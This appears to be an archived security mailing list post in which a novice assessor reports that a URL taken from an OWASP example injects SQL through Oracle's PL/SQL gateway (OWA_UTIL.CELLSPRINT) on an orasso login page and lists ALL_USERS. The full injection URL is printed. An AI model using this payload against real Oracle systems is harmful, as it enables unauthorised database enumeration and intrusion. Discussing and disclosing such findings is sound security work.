Re: Oracle SQL Injection on orasso reveals ALL_USERS

[Michael Alipio <daem0nb0y () yahoo com>]

 Hi,
 
 This is my first time doing a web application
 assessment. I was reading reading an article about
 Oracle assessment in OWASP and tried one of their
 examples. To my surprise,  by typing the URL below
 on my web browser, revealed all the information
 about ALL_USERS. I wonder what I can do with this
 finding? Maybe you can point me to the proper
 mailing list..
 
 

http://login.server.com/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(;1);--=SELECT+*
 +FROM+ALL_USERS
 
 
 Thanks
 
 
        



       
____________________________________________________________________________________
Pinpoint customers who are looking for what you sell. 
http://searchmarketing.yahoo.com/

-------------------------------------------------------------------------
Sponsored by: Watchfire

Cross-Site Scripting (XSS) is one of the most common application-level 
attacks that hackers use to sneak into web applications today. This 
whitepaper will discuss how traditional XSS attacks are performed, how to 
secure your site against these attacks and check if your site is protected. 
Cross-Site Scripting Explained - Download this whitepaper today! 

https://www.watchfire.com/securearea/whitepapers.aspx?id=701700000009405
-------------------------------------------------------------------------